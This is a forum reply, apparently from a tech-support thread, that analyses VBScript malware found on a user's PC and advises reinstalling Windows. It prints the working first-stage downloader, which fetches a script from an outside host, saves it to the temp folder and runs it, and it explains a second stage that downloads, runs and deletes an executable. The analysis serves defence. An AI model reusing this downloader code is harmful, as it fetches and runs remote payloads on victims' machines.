I am not willing to go as far as opening the websites you mentioned however, from the scripts above here is what I see...
Script 1 is creating a blank file, links to a website and downloads the content of the page and dumps it into the blank file. This file is saved as "yb.vbs" and is supposed to execute.
--------------------------
----------
----------
----------
----------
-
B="yb.vbs"
With CreateObject("MSXML2.XMLHT
TP")
.open "GET","
http://jyiop.com/kr/yb.vbs",f
alse
.send()
Set A = CreateObject("Scripting.Fi
leSystemOb
ject")
Set D = A.CreateTextFile(A.GetSpec
ialFolder(
2) + "\" + B)
D.WriteLine .responseText
End With
D.Close
CreateObject("WScript.Shel
l").Run A.GetSpecialFolder(2) + "\" + B
--------------------------
----------
----------
----------
----------
-
Step 2 Now that the vbs file has been created and run, it tries to visit another webpage but this time saves the web page content into a file called "exe.exe". This new file is to be saved into the users temp folder.
The script then runs the file "exe.exe".
As you mentioned, taskkill stops Windows Media player - why, who knows?!?!
The script then deletes the vb script that step 1 created (the script that is currently running).
There is a 3 second wait then the file "exe.exe" is deleted.
This part;
[maertS.BDODA = ADOBD.Stream
c.open OT, a, z:c.send()
If c.Status = x Then
u=c.ResponseBody:d.Open:d.
Type = y:d.Write u:d.SaveToFile b:d.Close]
is the script typing to open a file which will stream in the webpage - nothing to do with Adobe. "c.Status" - the script is waiting for the webpage to be ready and fit to download. "u=c.ResponseBody" takes the web page and shoves it into a variable. The stream is opened and the text is downloaded into the variable. The file is saved and closed. In this script the webpage/file is saved into the temp folder as "exe.exe".
The real danger is that "exe.exe" file. Once it has been run, there is no telling what it was designed to do.
That computer is still infected with a virus. The program "exe.exe" could have downloaded other viruses in the background to impede scans of the system. The fact that you can see the command window open and the script is attempted to run tells me there is some malicious file still lingering.
It may be time to evaluate what needs to be saved from that machine and start afresh with a re-install of Windows and applications. It sounds dramatic but seeing as the antivirus is not detecting anything out of sorts I think you are at the point of no return. Remember that as long as the malicious code is on there, any drive; be it USB memory stick, camera etc., can potentially contain the virus/trojan, if it was attached to the machine.
